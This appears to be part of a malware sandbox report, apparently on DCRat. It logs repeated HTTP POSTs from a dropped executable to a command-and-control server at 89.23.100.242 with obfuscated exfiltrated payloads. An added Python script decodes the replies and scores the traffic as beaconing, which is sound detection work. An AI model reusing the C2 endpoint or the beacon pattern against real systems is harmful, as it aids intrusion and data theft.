                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:22.235941887 CET | 2544 | OUT | Data Raw: 59 56 43 5f 5e 5d 56 52 58 5b 57 56 50 5f 5b 54 55 55 5e 5b 54 50 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVC_^]VRX[WVP_[TUU^[TPQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$8 <==<%(,\=R+-()+ \"7'W(X=<!2[8\&*'_!/Y.9
                                                                                                Jan 10, 2025 07:58:22.624304056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:22.756917953 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:22 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


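Sessions 48 to 57 above are the same POST to one path on 89.23.100.242:80, sent about once a second by C:\Windows\ShellExperiences\uAsLgsGzSk.exe, each carrying roughly 2.5 KB and usually answered with a 4-byte chunked body. As an added example (not code from this report, from Joe Sandbox or from the malware), the Python below transcribes the request timestamps, Content-Length values and two raw replies from the table, decodes the chunked replies, and scores the traffic with a simple beaconing heuristic. The jitter and size-spread thresholds are assumptions for illustration, not DCRat constants, and nothing here decodes the obfuscated payloads.

```python
"""
Beacon-shape checks over the uAsLgsGzSk.exe -> 89.23.100.242:80 sessions above.

The timestamps, Content-Length values and the two raw replies are transcribed
from this report's session table (sessions 48 to 57). The decoding and scoring
logic is an added illustration, not Joe Sandbox's code and not the malware's;
the jitter and size-spread thresholds are assumptions, not DCRat constants.
"""
from statistics import median

# Request first-line timestamp (CET) and Content-Length, one tuple per session.
SESSIONS = [
    ("07:58:14.849236965", 2544), ("07:58:15.738004923", 2544),
    ("07:58:16.754162073", 2536), ("07:58:17.940373898", 2544),
    ("07:58:18.940762997", 2544), ("07:58:20.254432917", 2544),
    ("07:58:20.510812998", 2036), ("07:58:20.786803007", 2544),
    ("07:58:21.888396978", 2544), ("07:58:23.446549892", 2544),
]

# Chunked response bodies exactly as printed in the report: the 14-byte reply
# most sessions receive, and the 163-byte body of the session 54 reply.
REPLY_SHORT_HEX = "34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a"
REPLY_54_HEX = (
    "39 38 0d 0a 0f 1e 39 54 34 3b 28 56 25 2c 35 57 3a 06 3e 0a 2b 20 3f 06 "
    "2a 03 20 03 3e 20 3f 57 3a 01 2f 1e 35 28 2e 04 2b 1c 3d 0a 26 3c 30 1e "
    "27 37 21 59 0c 13 26 13 3f 04 04 0e 3d 3a 02 13 28 0f 0b 19 30 1d 37 1d "
    "30 3d 3d 16 20 01 30 5a 3f 2a 29 51 2a 31 0c 0c 2d 07 2c 17 28 3c 0e 55 "
    "30 36 2a 57 0c 1f 26 52 22 21 39 13 21 21 36 58 27 16 27 10 33 01 3c 57 "
    "24 2f 20 05 23 04 27 58 2c 29 05 03 22 2d 2b 02 3e 3d 2d 0e 22 0b 37 09 "
    "2b 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a"
)


def to_seconds(ts: str) -> float:
    """'HH:MM:SS.fffffffff' -> seconds since midnight, nanoseconds kept."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def dechunk(body: bytes) -> bytes:
    """Strictly decode an HTTP/1.1 chunked body (no trailers accepted).

    Raises ValueError on any framing defect, so a truncated or tampered
    capture is reported instead of silently yielding partial data.
    """
    out = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size_field = body[pos:end].split(b";", 1)[0].strip()  # drop extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            raise ValueError(f"bad chunk size {size_field!r}") from None
        pos = end + 2
        if size == 0:
            if body[pos:] != b"\r\n":  # last-chunk must be followed by a bare CRLF
                raise ValueError("unexpected bytes after last chunk")
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def interval_profile(sessions):
    """Inter-request gaps, their median, and jitter = max|gap - median| / median."""
    times = [to_seconds(ts) for ts, _ in sessions]
    gaps = [b - a for a, b in zip(times, times[1:])]
    med = median(gaps)
    return {"gaps": gaps, "median": med,
            "jitter": max(abs(g - med) for g in gaps) / med}


def looks_like_beacon(sessions, max_jitter=1.0, max_size_spread=0.25):
    """Assumed heuristic: periodic POSTs of near-constant size to one endpoint."""
    jitter = interval_profile(sessions)["jitter"]
    sizes = [n for _, n in sessions]
    size_med = median(sizes)
    size_spread = max(abs(n - size_med) for n in sizes) / size_med
    return jitter <= max_jitter and size_spread <= max_size_spread


def summarize(sessions=SESSIONS):
    """Collect the observations an analyst would put in the report notes."""
    prof = interval_profile(sessions)
    return {
        "requests": len(sessions),
        "median_gap_s": round(prof["median"], 3),
        "jitter": round(prof["jitter"], 2),
        "beacon": looks_like_beacon(sessions),
        "reply_short": dechunk(bytes.fromhex(REPLY_SHORT_HEX)),
        "reply_54_len": len(dechunk(bytes.fromhex(REPLY_54_HEX))),
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

The median gap comes out near one second even though sessions 53 to 55 overlap (three requests inside half a second, the first of them never answered), which is why the heuristic tolerates jitter rather than demanding a fixed period. Decoding the replies confirms that the usual answer is the literal four bytes "=V@[" and that the session 54 reply is a single 0x98-byte chunk, consistent with the 349-byte transfer size printed for it.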
                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                57 | 192.168.2.4 | 49944 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:58:23.446549892 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:23.798440933 CET2544OUTData Raw: 5c 53 43 5e 5b 5b 56 57 58 5b 57 56 50 53 5b 5a 55 51 5e 5d 54 5e 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \SC^[[VWX[WVPS[ZUQ^]T^Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,1/]?=%>6$Z-)!<- \);$#4U<34*Y>$>4X0:'_!/Y.
                                                                                                Jan 10, 2025 07:58:24.203321934 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:24.340606928 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:24 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49955 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:24.474577904 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2536
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:24.829755068 CET | 2536 | OUT | Data Raw: 59 55 46 55 5b 5e 56 53 58 5b 57 56 50 5b 5b 5a 55 5d 5e 5f 54 51 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YUFU[^VSX[WVP[[ZU]^_TQQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;]>=1?6/.(,^<8+!4,<U7)<=2<$'_!/Y.
Jan 10, 2025 07:58:25.264178991 CET | 225 | IN | HTTP/1.1 100 Continue
    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49960 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:25.396646976 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:25.787328959 CET | 2544 | OUT | Data Raw: 5c 51 43 52 5b 5a 53 54 58 5b 57 56 50 52 5b 5b 55 51 5e 5c 54 5d 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \QCR[ZSTX[WVPR[[UQ^\T]Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,??[>?+/>-$X+(?!'(0/=*&>$3*'_!/Y.
Jan 10, 2025 07:58:26.134363890 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:26.285588980 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49966 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:26.411263943 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:26.767345905 CET | 2544 | OUT | Data Raw: 5c 56 43 52 5e 56 53 57 58 5b 57 56 50 53 5b 5b 55 55 5e 53 54 50 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \VCR^VSWX[WVPS[[UU^STPQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',?1\(#8:+X?8'5#? ?Y*/%'$*'_!/Y.
Jan 10, 2025 07:58:27.151107073 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:27.280587912 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49967 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:26.463062048 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2036
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:26.814057112 CET | 2036 | OUT | Data Raw: 59 50 46 50 5e 59 56 52 58 5b 57 56 50 52 5b 5a 55 51 5e 59 54 59 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YPFP^YVRX[WVPR[ZUQ^YTYQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.!$+."(,?=4X<+'"+ 3)$=$&:'_!/Y.
Jan 10, 2025 07:58:27.200588942 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49973 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:27.417792082 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:27.767205000 CET | 2544 | OUT | Data Raw: 5c 54 43 5e 5b 5d 56 5f 58 5b 57 56 50 5a 5b 55 55 52 5e 52 54 5b 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \TC^[]V_X[WVPZ[UUR^RT[QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/ ("?]/<4+^<64;U<0*%240'_!/Y.-
Jan 10, 2025 07:58:28.164181948 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:28.294439077 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49979 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:28.433119059 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:28.782846928 CET | 2544 | OUT | Data Raw: 5c 53 46 53 5e 5d 56 56 58 5b 57 56 50 5f 5b 50 55 57 5e 53 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \SFS^]VVX[WVP_[PUW^STPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/?[+=[>%',*U<='<875B'T(3)?"%70'_!/Y.9
Jan 10, 2025 07:58:29.187602043 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:29.339036942 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49990 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:29.471561909 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:29.829740047 CET | 2544 | OUT | Data Raw: 59 52 46 57 5b 5a 56 56 58 5b 57 56 50 5a 5b 52 55 57 5e 5b 54 5c 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YRFW[ZVVX[WVPZ[RUW^[T\Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$8#]([-<,Z,*->= _(4"4/< +?.&+&:'_!/Y.-
Jan 10, 2025 07:58:30.209095001 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:30.336771011 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49996 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:30.457621098 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:30.814064026 CET | 2544 | OUT | Data Raw: 59 5f 43 50 5e 5a 53 53 58 5b 57 56 50 53 5b 5a 55 51 5e 5f 54 51 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: Y_CP^ZSSX[WVPS[ZUQ^_TQQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.2/\+-&?(-:)T<<(7!'*3'_)2^3*'_!/Y.
Jan 10, 2025 07:58:31.195014954 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:31.345979929 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 50002 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:31.478198051 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:31.829890966 CET | 2544 | OUT | Data Raw: 59 51 46 55 5e 59 56 55 58 5b 57 56 50 5c 5b 5b 55 54 5e 58 54 5c 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
